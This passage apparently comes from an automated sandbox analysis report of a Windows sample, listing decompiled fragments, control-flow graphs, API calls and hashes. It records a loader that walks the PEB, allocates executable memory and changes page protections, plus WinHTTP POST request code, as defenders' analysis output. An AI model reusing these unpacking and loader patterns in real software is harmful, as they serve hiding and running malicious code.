                                                                                                                                                                                                                                                                				_v264 = 0;
                                                                                                                                                                                                                                                                				_v260 = 0;
                                                                                                                                                                                                                                                                				_t43 = E000D24CF( &_v284);
                                                                                                                                                                                                                                                                				if(_v284 != 0) {
                                                                                                                                                                                                                                                                					HeapFree(GetProcessHeap(), 0, _v284);
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				if(_t43 != 1) {
                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					 *_t32 = _v264;
                                                                                                                                                                                                                                                                					 *_t41 = _v260;
                                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                                                0x000d122b
                                                                                                                                                                                                                                                                0x000d122d
                                                                                                                                                                                                                                                                0x000d1236
                                                                                                                                                                                                                                                                0x000d123e
                                                                                                                                                                                                                                                                0x000d12ee
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d12ee
                                                                                                                                                                                                                                                                0x000d124e
                                                                                                                                                                                                                                                                0x000d1275
                                                                                                                                                                                                                                                                0x000d1292
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1297
                                                                                                                                                                                                                                                                0x000d12a4
                                                                                                                                                                                                                                                                0x000d12a8
                                                                                                                                                                                                                                                                0x000d12b0
                                                                                                                                                                                                                                                                0x000d12b4
                                                                                                                                                                                                                                                                0x000d12bd
                                                                                                                                                                                                                                                                0x000d12c3
                                                                                                                                                                                                                                                                0x000d12d1
                                                                                                                                                                                                                                                                0x000d12d1
                                                                                                                                                                                                                                                                0x000d12de
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d12e0
                                                                                                                                                                                                                                                                0x000d12e4
                                                                                                                                                                                                                                                                0x000d12ea
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d12ea

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(-id=), ref: 000D122F
                                                                                                                                                                                                                                                                • StrStrIA.KERNELBASE(00000000), ref: 000D1236
                                                                                                                                                                                                                                                                • StrToIntA.SHLWAPI(-00000004), ref: 000D1248
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 000D125D
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 000D1275
                                                                                                                                                                                                                                                                  • Part of subcall function 000D143A: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,000D128D,?), ref: 000D1456
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 000D12CA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D12D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$CommandCreateFileFreeLinePathProcessTempwsprintf
                                                                                                                                                                                                                                                                • String ID: -id=$~%u.tmp
                                                                                                                                                                                                                                                                • API String ID: 3150461372-3856365564
                                                                                                                                                                                                                                                                • Opcode ID: 70566aa0c0303591567e1ec83c880a4c34c1296e195b7483b82adba6d71d87be
                                                                                                                                                                                                                                                                • Instruction ID: 543f7a099749763c17dc624aa95e56419ef77de10af8ebcee0cedf1a43c77e98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70566aa0c0303591567e1ec83c880a4c34c1296e195b7483b82adba6d71d87be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2145B25053059FD714AFA0D8489AA7FE8FB88355F00091EFA85D2251DB39D518CB75
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 606 13004fd-1300566 609 1300570-1300579 GetPEB 606->609 610 1300568-130056e 606->610 611 130057f-130058d 609->611 610->611 612 130059f-13005b7 611->612 613 130058f-1300598 611->613 614 13005f5-13006bb VirtualAlloc call 13002e1 call 13002b3 VirtualAlloc call 130023e VirtualFree 612->614 615 13005b9-13005bb 612->615 613->612 623 13006d8-13006e4 614->623 624 13006bd-13006d7 call 13002e1 614->624 615->614 616 13005bd-13005f1 VirtualAlloc 615->616 616->614 626 13006e6-13006e9 623->626 627 13006eb 623->627 624->623 629 13006ee-1300709 call 13002b3 626->629 627->629 632 1300723-1300752 629->632 633 130070b-130071e call 1300195 629->633 635 1300754-1300762 632->635 636 1300768-1300773 632->636 633->632 635->636 637 1300764 635->637 638 1300775-130077e 636->638 639 130078e-13007ba VirtualProtect 636->639 637->636 638->639 640 1300780-1300788 638->640 643 13007bc-13007c8 639->643 644 13007ef-1300859 call 1300414 call 13003a6 639->644 640->639 642 130078a 640->642 642->639 645 13007ca-13007e1 VirtualProtect 643->645 652 1300878-13008ad VirtualProtect 644->652 653 130085b-1300873 call 130044a 644->653 647 13007e3 645->647 648 13007e5-13007ed 645->648 647->648 648->644 648->645 654 13008b3-13008d8 652->654 653->652 656 13008e1 654->656 657 13008da-13008df 654->657 658 13008e6-13008f1 656->658 657->658 659 13008f3 658->659 660 13008f6-130090e VirtualProtect 658->660 659->660 660->654 661 1300910-130093f VirtualFree GetPEB 660->661 662 1300944-1300949 661->662 663 130094b 662->663 664 130094f-1300969 662->664 663->662 665 130094d 663->665 666 130096c-1300996 664->666 665->666
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,0000099E,00003000,00000040,0000099E,01300000), ref: 013005D1
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,0000004E,00003000,00000040,01300039), ref: 01300608
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000036ED,00003000,00000040), ref: 01300668
                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(01320000,00000000,00008000), ref: 0130069E
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(000D0000,00006000,00000004,013004D4), ref: 013007B2
                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(000D0000,00001000,00000004,013004D4), ref: 013007D9
                                                                                                                                                                                                                                                                  • Part of subcall function 013003A6: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 013003DF
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(000D0000,?,00000002,013004D4), ref: 013008AD
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(000D0000,?,00000002,013004D4,?), ref: 01300903
                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(01320000,00000000,00008000), ref: 01300927
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1300000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual$Protect$Alloc$Free$LibraryLoad
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1732388798-0
                                                                                                                                                                                                                                                                • Opcode ID: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
                                                                                                                                                                                                                                                                • Instruction ID: 7c71095f3363e4777b0baf7c71de7b1140012bb989f61651294e1d3054374041
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4D16DB2700B019FDF958F14C9D8B6177ABFF84764B0D4198ED099F6AAD770A840CB68
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 667 28fb73-28fbdc 670 28fbde-28fbe4 667->670 671 28fbe6-28fbef GetPEB 667->671 672 28fbf5-28fc03 670->672 671->672 673 28fc15-28fc2d 672->673 674 28fc05-28fc0e 672->674 675 28fc6b-28fd31 VirtualAlloc call 28f957 call 28f929 VirtualAlloc call 28f8b4 VirtualFree 673->675 676 28fc2f-28fc31 673->676 674->673 684 28fd4e-28fd5a 675->684 685 28fd33-28fd4d call 28f957 675->685 676->675 677 28fc33-28fc67 VirtualAlloc 676->677 677->675 687 28fd5c-28fd5f 684->687 688 28fd61 684->688 685->684 690 28fd64-28fd7f call 28f929 687->690 688->690 693 28fd99-28fdc8 690->693 694 28fd81-28fd94 call 28f80b 690->694 696 28fdca-28fdd8 693->696 697 28fdde-28fde9 693->697 694->693 696->697 698 28fdda 696->698 699 28fdeb-28fdf4 697->699 700 28fe04-28fe30 VirtualProtect 697->700 698->697 699->700 701 28fdf6-28fdfe 699->701 704 28fe32-28fe3e 700->704 705 28fe65-28fecf call 28fa8a call 28fa1c 700->705 701->700 703 28fe00 701->703 703->700 706 28fe40-28fe57 VirtualProtect 704->706 713 28feee-28ff23 VirtualProtect 705->713 714 28fed1-28fee9 call 28fac0 705->714 708 28fe59 706->708 709 28fe5b-28fe63 706->709 708->709 709->705 709->706 716 28ff29-28ff4e 713->716 714->713 717 28ff50-28ff55 716->717 718 28ff57 716->718 719 28ff5c-28ff67 717->719 718->719 720 28ff69 719->720 721 28ff6c-28ff84 VirtualProtect 719->721 720->721 721->716 722 28ff86-28ffb5 VirtualFree GetPEB 721->722 723 28ffba-28ffbf 722->723 724 28ffc1 723->724 725 28ffc5-28ffdf 723->725 724->723 724->725
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,0000099E,00003000,00000040,0000099E,0028F676), ref: 0028FC47
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,0000004E,00003000,00000040,0028F6AF), ref: 0028FC7E
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000036ED,00003000,00000040), ref: 0028FCDE
                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0028FD14
                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(000D0000,00000000,00000004,0028FB4A), ref: 0028FE28
                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(000D0000,00001000,00000004,0028FB4A), ref: 0028FE4F
                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,0028FB4A), ref: 0028FF23
                                                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,0028FB4A,?), ref: 0028FF79
                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0028FF9D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.566404835.000000000028F000.00000040.00020000.sdmp, Offset: 0028F000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_28f000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c23676164e1b2061ca9d054a87c66034e539bb7dd3c27851c800084a2ea1acf
                                                                                                                                                                                                                                                                • Instruction ID: ba1e4b1fec3ec32699dc5e6545f6ef3e48f80346325368f9e0713f7d2f5d4503
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c23676164e1b2061ca9d054a87c66034e539bb7dd3c27851c800084a2ea1acf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BD16EB6701B019FDF90DF14C9C8B5177AAFF84324B0D41A8ED099F6AAD770A850CB68
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0014799F
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000016), ref: 001479A8
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 001479BB
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000015), ref: 001479D2
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 001479DE
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00147A14
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 00147A22
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000015), ref: 00147A30
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000016), ref: 00147A3E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 00147A4C
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00147A5A
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00147A68
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000006), ref: 00147A73
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000D), ref: 00147A7E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000E), ref: 00147A89
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000005), ref: 00147A94
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 00147AA2
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000009), ref: 00147AAD
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000007), ref: 00147AB8
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000002), ref: 00147AC3
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000003), ref: 00147ACE
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000001B), ref: 00147ADC
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000001C), ref: 00147AEA
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000A), ref: 00147AF8
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000B), ref: 00147B06
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000013), ref: 00147B14
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000001A), ref: 00147B35
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(00000010), ref: 00147B4E
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(00000014), ref: 00147B62
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 00147B71
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000180), ref: 00147B8E
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000010), ref: 00147BAC
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147BCA
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147BEB
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147C09
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147C27
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147C45
                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00000000), ref: 00147C69
                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00000000), ref: 00147C8D
                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00000000), ref: 00147CB1
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00147D39
                                                                                                                                                                                                                                                                • CreatePatternBrush.GDI32(00000000), ref: 00147D7B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreate$Solid$H_prolog3Pattern
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3391476863-1727780284
                                                                                                                                                                                                                                                                • Opcode ID: c17d6e603f7a4256c9c9847da9cd6de3f780279f7dabad5201b9d2ff9c302cbf
                                                                                                                                                                                                                                                                • Instruction ID: 3ff35f6dbddef6292d6c98bdb992082c9013336e00783f555f39a308d8b7d00e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c17d6e603f7a4256c9c9847da9cd6de3f780279f7dabad5201b9d2ff9c302cbf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44C1BF70A04A56AFCB09AFB4AC0D7AEBBA0BF55700F404119E225D72D1DFB4E5A1CF91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 85 14745f-1474bc call 249763 call 12738b 91 1474d7 85->91 92 1474be-1474cd 85->92 94 1474d9 91->94 93 1474cf-1474d5 92->93 92->94 95 1474db-1474e3 93->95 94->95 96 1474e5-1474e9 95->96 97 1474f9-147501 95->97 96->97 98 1474eb-1474f3 call 127fb4 DeleteObject 96->98 99 147517-14751f 97->99 100 147503-147507 97->100 98->97 103 147535-14753d 99->103 104 147521-147525 99->104 100->99 102 147509-147511 call 127fb4 DeleteObject 100->102 102->99 105 147553-14755b 103->105 106 14753f-147543 103->106 104->103 109 147527-14752f call 127fb4 DeleteObject 104->109 112 147571-147579 105->112 113 14755d-147561 105->113 106->105 111 147545-14754d call 127fb4 DeleteObject 106->111 109->103 111->105 118 14758f-147597 112->118 119 14757b-14757f 112->119 113->112 117 147563-14756b call 127fb4 DeleteObject 113->117 117->112 120 1475ad-1475b5 118->120 121 147599-14759d 118->121 119->118 124 147581-147589 call 127fb4 DeleteObject 119->124 126 1475b7-1475bb 120->126 127 1475cb-1475d3 120->127 121->120 125 14759f-1475a7 call 127fb4 DeleteObject 121->125 124->118 125->120 126->127 132 1475bd-1475c5 call 127fb4 DeleteObject 126->132 133 1475d5-1475d9 127->133 134 1475e9-1475f1 127->134 132->127 133->134 139 1475db-1475e3 call 127fb4 DeleteObject 133->139 135 147607-147662 call 146f60 call 24afd0 GetTextCharsetInfo 134->135 136 1475f3-1475f7 134->136 150 147664-147667 135->150 151 147669-14766d 135->151 136->135 140 1475f9-147601 call 127fb4 DeleteObject 136->140 139->134 140->135 152 147670-147677 150->152 151->152 153 14766f 151->153 154 147679 152->154 155 14767b-147693 lstrcpyW 152->155 153->152 154->155 156 147695-14769c 155->156 157 147701-14774b CreateFontIndirectW call 127dff call 25167f call 249b80 155->157 156->157 158 14769e-1476b8 EnumFontFamiliesW 156->158 170 147752-147858 CreateFontIndirectW call 127dff call 146f60 CreateFontIndirectW call 127dff CreateFontIndirectW call 127dff CreateFontIndirectW call 127dff GetSystemMetrics lstrcpyW CreateFontIndirectW call 127dff GetStockObject 157->170 171 14774d-14774f 157->171 160 1476cf-1476ec EnumFontFamiliesW 158->160 161 1476ba-1476cd lstrcpyW 158->161 163 1476f5 160->163 164 1476ee-1476f3 160->164 161->157 166 1476fa-1476fb lstrcpyW 163->166 164->166 166->157 184 1478d3-147938 GetStockObject call 1280d0 GetObjectW CreateFontIndirectW call 127dff CreateFontIndirectW call 127dff call 147db5 170->184 185 14785a-147869 GetObjectW 170->185 171->170 198 147968-14796a 184->198 185->184 187 14786b-1478ce lstrcpyW CreateFontIndirectW call 127dff CreateFontIndirectW call 127dff 185->187 187->184 199 14796c-14797c call 12748f 198->199 200 14793a-14793e 198->200 204 147981-147991 call 127601 call 24970d 199->204 202 147940-147947 200->202 203 147992-147997 call 118704 200->203 202->203 205 147949-147953 call 11fa06 202->205 205->198 213 147955-147964 call 2496f2 205->213 213->198
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00147469
                                                                                                                                                                                                                                                                  • Part of subcall function 0012738B: __EH_prolog3.LIBCMT ref: 00127392
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001474F3
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00147511
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0014752F
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0014754D
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0014756B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00147589
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001475A7
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001475C5
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001475E3
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00147601
                                                                                                                                                                                                                                                                • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00147639
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 00147689
                                                                                                                                                                                                                                                                • EnumFontFamiliesW.GDI32(?,00000000,00146DFB,Segoe UI), ref: 001476B0
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,Segoe UI), ref: 001476C3
                                                                                                                                                                                                                                                                • EnumFontFamiliesW.GDI32(?,00000000,00146DFB,Tahoma), ref: 001476E1
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 001476FB
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00147705
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00147756
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00147795
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 001477C1
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 001477E2
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000048), ref: 00147801
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,Marlett), ref: 00147814
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0014781E
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 0014784A
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?,?,?,00000000), ref: 00147861
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,Arial), ref: 0014789E
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 001478A8
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 001478C1
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 001478D5
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?,00000000,?,?,00000000), ref: 001478EA
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 001478F8
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00147919
                                                                                                                                                                                                                                                                  • Part of subcall function 00147DB5: __EH_prolog3_GS.LIBCMT ref: 00147DBC
                                                                                                                                                                                                                                                                  • Part of subcall function 00147DB5: GetTextMetricsW.GDI32(?,?,?,00000000,00000054,00147932,00000000,?,?,00000000), ref: 00147DF2
                                                                                                                                                                                                                                                                  • Part of subcall function 00147DB5: GetTextMetricsW.GDI32(?,?,?,?,?,00000000), ref: 00147E33
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CharsetException@8H_prolog3InfoSystemThrow
                                                                                                                                                                                                                                                                • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                                                                                                                                                                                                                • API String ID: 3775395853-1395034203
                                                                                                                                                                                                                                                                • Opcode ID: 2edf5d29e05a6702f8c37316214c898aaebec330c42f750d0e5b4405e538e9c6
                                                                                                                                                                                                                                                                • Instruction ID: d74691be96f236c0fa902587e5cc44353ff4b7288c048167c9975fba58f08f76
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2edf5d29e05a6702f8c37316214c898aaebec330c42f750d0e5b4405e538e9c6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6E19FB0A083499BDF11AFB0ED4CBEEBBB8AF55304F004459E559AB2A1DF749984CF11
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 217 d14ec-d1525 WinHttpOpen 218 d1719-d1724 217->218 219 d152b-d152e 217->219 220 d1530-d1533 219->220 221 d1543-d155b WinHttpConnect 219->221 220->221 222 d1535-d153d WinHttpSetStatusCallback 220->222 223 d1561-d157b 221->223 224 d1712-d1713 WinHttpCloseHandle 221->224 222->221 225 d157d 223->225 226 d1582-d1595 WinHttpOpenRequest 223->226 224->218 225->226 227 d159b-d159e 226->227 228 d1704-d170e WinHttpCloseHandle 226->228 229 d15b8-d15d7 WinHttpSendRequest 227->229 230 d15a0-d15b2 WinHttpSetOption 227->230 228->224 231 d16fd-d16fe WinHttpCloseHandle 229->231 232 d15dd-d15e9 WinHttpReceiveResponse 229->232 230->229 231->228 232->231 233 d15ef-d1655 WinHttpQueryHeaders * 2 GetProcessHeap 232->233 234 d16bd-d16bf 233->234 235 d1657-d165d 234->235 236 d16c1 234->236 237 d165f-d1662 235->237 238 d16c5-d16ca 235->238 236->238 239 d1664-d1668 237->239 240 d16c3 237->240 241 d16cc-d16d0 238->241 242 d16e9-d16eb 238->242 245 d1678-d167d GetProcessHeap HeapAlloc 239->245 246 d166a-d1676 GetProcessHeap RtlReAllocateHeap 239->246 240->238 241->242 247 d16d2-d16d4 241->247 243 d16ed 242->243 244 d16f1-d16fb 242->244 243->244 244->231 248 d1683-d1687 245->248 246->248 249 d16d6-d16dc GetProcessHeap HeapFree 247->249 250 d16e2-d16e7 247->250 248->238 251 d1689-d169f WinHttpReadData 248->251 249->250 250->231 251->238 252 d16a1-d16a6 251->252 252->238 253 d16a8-d16b7 WinHttpQueryDataAvailable 252->253 253->234
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000D1517
                                                                                                                                                                                                                                                                • WinHttpSetStatusCallback.WINHTTP(00000000,?,?,00000000,?,00000000), ref: 000D153D
                                                                                                                                                                                                                                                                • WinHttpConnect.WINHTTP(00000000,?,?,00000000,?,00000000), ref: 000D154D
                                                                                                                                                                                                                                                                • WinHttpOpenRequest.WINHTTP(00000000,POST,?,00000000,00000000,00000000,?,?,00000000), ref: 000D158B
                                                                                                                                                                                                                                                                • WinHttpSetOption.WINHTTP(00000000,0000001F,?,?,?,?,?,00000004,?,00000000), ref: 000D15B2
                                                                                                                                                                                                                                                                • WinHttpSendRequest.WINHTTP(00000000,?,?,?,?,?,00000000,?,00000000), ref: 000D15CF
                                                                                                                                                                                                                                                                • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,00000000), ref: 000D15E1
                                                                                                                                                                                                                                                                • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,?,00000000,?,00000000), ref: 000D160F
                                                                                                                                                                                                                                                                • WinHttpQueryHeaders.WINHTTP(00000000,20000005,00000000,?,?,00000000,?,00000000), ref: 000D1635
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 000D1649
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000), ref: 000D166D
